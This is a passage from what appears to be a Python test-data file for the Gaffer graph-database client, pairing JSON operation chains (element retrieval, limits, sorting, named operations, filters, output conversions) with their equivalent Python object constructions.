}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet",
"key" : "edges"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet",
"key" : "entities"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.GetExports",
"getExports" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"key" : "edges",
"start" : 0
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"key" : "entities",
"start" : 0
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToSet(
key="edges"
),
g.DiscardOutput(),
g.GetAllElements(),
g.ExportToSet(
key="entities"
),
g.DiscardOutput(),
g.GetExports(
get_exports=[
g.GetSetExport(
start=0,
key="edges"
),
g.GetSetExport(
start=0,
key="entities"
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : 3,
"truncate" : true
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.Limit(
truncate=True,
result_limit=3
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : 3,
"truncate" : false
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.Limit(
truncate=False,
result_limit=3
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : 3,
"truncate" : true
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.Limit(
result_limit=3,
truncate=True
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.compare.Max",
"comparators" : [ {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "count",
"groups" : [ "entity", "edge" ],
"reversed" : false
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.Max(
comparators=[
g.ElementPropertyComparator(
groups=[
"entity",
"edge"
],
property="count",
reversed=False
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"transientProperties" : {
"score" : "java.lang.Integer"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
},
"selection" : [ "DESTINATION", "count" ],
"projection" : [ "score" ]
} ]
}
},
"entities" : {
"entity" : {
"transientProperties" : {
"score" : "java.lang.Integer"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
},
"selection" : [ "VERTEX", "count" ],
"projection" : [ "score" ]
} ]
}
}
},
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.compare.Max",
"comparators" : [ {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "count",
"groups" : [ "entity", "edge" ],
"reversed" : false
}, {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "score",
"groups" : [ "entity", "edge" ],
"reversed" : false
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
],
view=g.View(
edges=[
g.ElementDefinition(
transform_functions=[
g.FunctionContext(
selection=[
"DESTINATION",
"count"
],
function=g.Function(
class_name="uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction",
fields={}
),
projection=[
"score"
]
)
],
group="edge",
transient_properties={
'score': 'java.lang.Integer'}
)
],
entities=[
g.ElementDefinition(
transform_functions=[
g.FunctionContext(
selection=[
"VERTEX",
"count"
],
function=g.Function(
class_name="uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction",
fields={}
),
projection=[
"score"
]
)
],
group="entity",
transient_properties={
'score': 'java.lang.Integer'}
)
]
)
),
g.Max(
comparators=[
g.ElementPropertyComparator(
reversed=False,
groups=[
"entity",
"edge"
],
property="count"
),
g.ElementPropertyComparator(
reversed=False,
groups=[
"entity",
"edge"
],
property="score"
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.compare.Min",
"comparators" : [ {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "count",
"groups" : [ "entity", "edge" ],
"reversed" : false
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.Min(
comparators=[
g.ElementPropertyComparator(
property="count",
groups=[
"entity",
"edge"
],
reversed=False
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"transientProperties" : {
"score" : "java.lang.Integer"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
},
"selection" : [ "DESTINATION", "count" ],
"projection" : [ "score" ]
} ]
}
},
"entities" : {
"entity" : {
"transientProperties" : {
"score" : "java.lang.Integer"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
},
"selection" : [ "VERTEX", "count" ],
"projection" : [ "score" ]
} ]
}
}
},
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.compare.Min",
"comparators" : [ {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "count",
"groups" : [ "entity", "edge" ],
"reversed" : false
}, {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "score",
"groups" : [ "entity", "edge" ],
"reversed" : false
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
],
view=g.View(
entities=[
g.ElementDefinition(
transform_functions=[
g.FunctionContext(
function=g.Function(
fields={},
class_name="uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
),
selection=[
"VERTEX",
"count"
],
projection=[
"score"
]
)
],
transient_properties={
'score': 'java.lang.Integer'},
group="entity"
)
],
edges=[
g.ElementDefinition(
transform_functions=[
g.FunctionContext(
function=g.Function(
fields={},
class_name="uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
),
selection=[
"DESTINATION",
"count"
],
projection=[
"score"
]
)
],
transient_properties={
'score': 'java.lang.Integer'},
group="edge"
)
]
)
),
g.Min(
comparators=[
g.ElementPropertyComparator(
groups=[
"entity",
"edge"
],
property="count",
reversed=False
),
g.ElementPropertyComparator(
groups=[
"entity",
"edge"
],
property="score",
reversed=False
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.AddNamedOperation",
"operationName" : "2-hop",
"description" : "2 hop query",
"readAccessRoles" : [ "read-user" ],
"writeAccessRoles" : [ "write-user" ],
"overwriteFlag" : true,
"labels": ["label_1", "label_2"],
"operationChain" : {
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
} ]
}
}
''',
g.AddNamedOperation(
operation_chain=g.OperationChainDAO(
operations=[
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
),
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
)
]
),
overwrite_flag=True,
write_access_roles=[
"write-user"
],
description="2 hop query",
read_access_roles=[
"read-user"
],
operation_name="2-hop",
labels = ["label_1", "label_2"]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.AddNamedOperation",
"operationName" : "2-hop-with-score",
"description" : "2 hop query",
"readAccessRoles" : [ "read-user" ],
"writeAccessRoles" : [ "write-user" ],
"overwriteFlag" : true,
"score" : 3,
"operationChain" : {
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
} ]
}
}
''',
g.AddNamedOperation(
operation_chain=g.OperationChainDAO(
operations=[
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
),
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
)
]
),
overwrite_flag=True,
write_access_roles=[
"write-user"
],
description="2 hop query",
read_access_roles=[
"read-user"
],
score=3,
operation_name="2-hop-with-score"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.AddNamedOperation",
"operationName" : "2-hop-with-limit",
"description" : "2 hop query with settable limit",
"readAccessRoles" : [ "read-user" ],
"writeAccessRoles" : [ "write-user" ],
"overwriteFlag" : true,
"parameters" : {
"param1" : {
"description" : "Limit param",
"defaultValue" : 1,
"valueClass" : "java.lang.Long",
"required" : false
}
},
"operationChain" : {
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : "${param1}"
} ]
}
}
''',
g.AddNamedOperation(
description="2 hop query with settable limit",
parameters=[
g.NamedOperationParameter(
value_class="java.lang.Long",
description="Limit param",
required=False,
default_value=1,
name="param1"
)
],
operation_name="2-hop-with-limit",
overwrite_flag=True,
read_access_roles=[
"read-user"
],
write_access_roles=[
"write-user"
],
operation_chain=g.OperationChainDAO(
operations=[
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
),
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
),
g.Limit(
result_limit="${param1}"
)
]
)
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.AddNamedOperation",
"operationName" : "2-hop-with-limit",
"description" : "2 hop query with settable limit",
"readAccessRoles" : [ "read-user" ],
"writeAccessRoles" : [ "write-user" ],
"overwriteFlag" : true,
"parameters" : {
"param1" : {
"description" : "Limit param",
"defaultValue" : 1,
"valueClass" : "java.lang.Long",
"required" : false
}
},
"operationChain" : {
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : "${param1}"
} ]
}
}
''',
g.AddNamedOperation(
read_access_roles=[
"read-user"
],
operation_chain=g.OperationChainDAO(
operations=[
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
),
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
),
g.Limit(
result_limit="${param1}"
)
]
),
write_access_roles=[
"write-user"
],
parameters=[
g.NamedOperationParameter(
required=False,
value_class="java.lang.Long",
name="param1",
default_value=1,
description="Limit param"
)
],
operation_name="2-hop-with-limit",
overwrite_flag=True,
description="2 hop query with settable limit"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.GetAllNamedOperations"
}
''',
g.GetAllNamedOperations()
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.NamedOperation",
"operationName" : "2-hop",
"input" : [ {
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.NamedOperation(
operation_name="2-hop",
input=[
g.EntitySeed(
vertex=1
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.NamedOperation",
"operationName" : "2-hop-with-limit",
"parameters" : {
"param1" : 2
},
"input" : [ {
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.NamedOperation(
parameters={'param1': 2},
input=[
g.EntitySeed(
vertex=1
)
],
operation_name="2-hop-with-limit"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.DeleteNamedOperation",
"operationName" : "2-hop"
}
''',
g.DeleteNamedOperation(
operation_name="2-hop"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.compare.Sort",
"comparators" : [ {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "count",
"groups" : [ "entity", "edge" ],
"reversed" : false
} ],
"resultLimit" : 10,
"deduplicate" : true
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.Sort(
comparators=[
g.ElementPropertyComparator(
property="count",
groups=[
"entity",
"edge"
],
reversed=False
)
],
result_limit=10,
deduplicate=True
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.compare.Sort",
"comparators" : [ {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "count",
"groups" : [ "entity", "edge" ],
"reversed" : false
} ],
"resultLimit" : 10,
"deduplicate" : false
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.Sort(
result_limit=10,
deduplicate=False,
comparators=[
g.ElementPropertyComparator(
property="count",
groups=[
"entity",
"edge"
],
reversed=False
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"transientProperties" : {
"score" : "java.lang.Integer"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
},
"selection" : [ "DESTINATION", "count" ],
"projection" : [ "score" ]
} ]
}
},
"entities" : {
"entity" : {
"transientProperties" : {
"score" : "java.lang.Integer"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
},
"selection" : [ "VERTEX", "count" ],
"projection" : [ "score" ]
} ]
}
}
},
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.compare.Sort",
"comparators" : [ {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "count",
"groups" : [ "entity", "edge" ],
"reversed" : false
}, {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "score",
"groups" : [ "entity", "edge" ],
"reversed" : false
} ],
"resultLimit" : 4,
"deduplicate" : true
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
],
view=g.View(
edges=[
g.ElementDefinition(
transform_functions=[
g.FunctionContext(
projection=[
"score"
],
selection=[
"DESTINATION",
"count"
],
function=g.Function(
class_name="uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction",
fields={}
)
)
],
group="edge",
transient_properties={
'score': 'java.lang.Integer'}
)
],
entities=[
g.ElementDefinition(
transform_functions=[
g.FunctionContext(
projection=[
"score"
],
selection=[
"VERTEX",
"count"
],
function=g.Function(
class_name="uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction",
fields={}
)
)
],
group="entity",
transient_properties={
'score': 'java.lang.Integer'}
)
]
)
),
g.Sort(
result_limit=4,
comparators=[
g.ElementPropertyComparator(
property="count",
groups=[
"entity",
"edge"
],
reversed=False
),
g.ElementPropertyComparator(
property="score",
groups=[
"entity",
"edge"
],
reversed=False
)
],
deduplicate=True
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToArray"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToArray()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToCsv",
"elementGenerator" : {
"class" : "uk.gov.gchq.gaffer.data.generator.CsvGenerator",
"fields" : {
"GROUP" : "Edge group",
"VERTEX" : "vertex",
"SOURCE" : "source",
"count" : "total count"
},
"quoted" : false
},
"includeHeader" : true
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToCsv(
include_header=True,
element_generator=g.CsvGenerator(
fields={
'GROUP': 'Edge group',
'VERTEX': 'vertex',
'count': 'total count',
'SOURCE': 'source'
},
quoted=False
)
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToEntitySeeds"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToEntitySeeds()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToList"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToList()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToMap",
"elementGenerator" : {
"class" : "uk.gov.gchq.gaffer.data.generator.MapGenerator",
"fields" : {
"GROUP" : "group",
"VERTEX" : "vertex",
"SOURCE" : "source",
"count" : "total count"
}
}
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToMap(
element_generator=g.MapGenerator(
fields={
'SOURCE': 'source',
'count': 'total count',
'VERTEX': 'vertex',
'GROUP': 'group'
}
)
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToSet"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToSet()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToStream"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToStream()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : { },
"entities" : {
"entity" : { }
}
},
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToVertices",
"edgeVertices" : "NONE"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToSet"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
view=g.View(
edges=[
],
entities=[
g.ElementDefinition(
group="entity"
)
]
),
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToVertices(
edge_vertices="NONE"
),
g.ToSet()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
},
"includeIncomingOutGoing" : "OUTGOING",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToVertices",
"edgeVertices" : "DESTINATION"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToSet"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
group="edge"
)
]
),
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
],
include_incoming_out_going="OUTGOING"
),
g.ToVertices(
edge_vertices="DESTINATION"
),
g.ToSet()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
},
"includeIncomingOutGoing" : "OUTGOING",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToVertices",
"edgeVertices" : "BOTH"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToSet"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
group="edge"
)
]
),
include_incoming_out_going="OUTGOING",
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToVertices(
edge_vertices="BOTH"
),
g.ToSet()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
},
"includeIncomingOutGoing" : "OUTGOING",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToVertices",
"useMatchedVertex" : "EQUAL"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToSet"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
view=g.View(
edges=[
g.ElementDefinition(
group="edge"
)
],
entities=[
]
),
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
],
include_incoming_out_going="OUTGOING"
),
g.ToVertices(
use_matched_vertex="EQUAL"
),
g.ToSet()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.job.GetJobResults",
"jobId" : "job1"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.function.Filter",
"globalEdges" : {
"predicates" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 2
},
"selection" : [ "count" ]
} ]
}
} ]
}
''',
g.OperationChain(
operations=[
g.GetJobResults(
job_id="job1"
),
g.Filter(
global_edges=g.GlobalElementFilterDefinition(
predicates=[
g.PredicateContext(
selection=["count"],
predicate=g.IsMoreThan(
value=2,
or_equal_to=False
)
)
]
)
)
]
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.function.Filter",
"globalElements": {
"predicates": [
{
"selection": [
"timestamp"
],
"predicate": {
"class": "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"value": 1,
"orEqualTo": true
}
},
{
"selection": [
"timestamp"
],
"predicate": {
"class": "uk.gov.gchq.koryphe.impl.predicate.IsLessThan",
"value": 10,
"orEqualTo": true
}
}
]
},
"edges": {
"edge2": {
"predicates": [
{
"selection": [
"prop2"
],
"predicate": {
"class": "uk.gov.gchq.koryphe.impl.predicate.Regex",
"value": "a.*"
}
}
]
},
"edge1": {
"predicates": [
{
"selection": [
"prop2"
],
"predicate": {
